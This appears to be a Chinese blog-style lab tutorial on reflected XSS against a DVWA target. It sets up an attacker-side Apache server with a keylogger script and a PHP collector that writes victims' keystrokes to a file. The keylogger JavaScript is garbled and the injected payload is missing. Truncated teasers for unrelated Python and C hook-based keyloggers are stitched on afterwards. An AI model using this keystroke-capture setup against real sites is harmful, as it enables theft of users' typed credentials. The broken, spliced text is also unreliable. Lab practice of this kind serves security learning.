本實驗以反射性的xss漏洞為例
實驗環境:dvwa靶機(ip:192.168.135.140)
kali linux(ip:192.168.135.138)
1.首先開啟在kail上開啟apache服務
/etc/init.d/apache2 start
在firefox位址列輸入: 或者 http://localhost 檢測apache是否開啟,看見以下即可
2.在/var/www/html建立三個檔案
(1)keylogger.js【遠端js指令碼檔案】
document.onkeypress = function(evt)
}
(2)keylogger.php 【用於將鍵盤上的敲擊的記錄通過post傳送到keylog.txt中】
<?php
$key = $_post['key'];
$log = fopen("keylog.txt","a");
fwrite($log,$key);
fclose($log);
?>
(3)keylog.txt 【空檔案用於接收鍵盤的記錄】
2.xss漏洞測試開始
(1)在瀏覽器訪問dvwa靶機並且登入
(2)在輸入框中輸入以下**
或者使用hackbar外掛程式
(3)緊接著在這個頁面隨意敲擊鍵盤並檢視keylog.txt是否有記錄
看見以上效果及實驗成功。
python 鍵盤記錄器
coding utf 8 from ctypes import import pythoncom import pyhook import win32clipboard user32 windll.user32 kernel32 windll.kernel32 psapi windll.psapi ...
C Hook 鍵盤記錄器
之前寫外掛程式做過指定程序的 hook,但是沒有嘗試過全域性 hook,所以今天就來試試。全域性 hook 的用途我第乙個就想到了鍵盤記錄器 貌似我也就想到了這個 哈哈 那就寫乙個吧。先上效果圖 沒圖沒真相,我看別人的部落格都喜歡上來先看圖,木哈哈 u u 其實也不多,就是 switch case ...
C 黑客程式設計 鍵盤記錄器,HOOK技術實現
有一種技術被稱為hook,人們習慣上叫做鉤子。鉤子技術的應用範圍比較廣 輸入監控,api攔截,訊息捕獲等等。今天我們來做的是鍵盤記錄器 編譯工具 visual studio 2019 程式語言 自然是c python做的我會寫個標題 c 嗎?程式設計技術 hook 另外我說一下 hook技術分為好幾...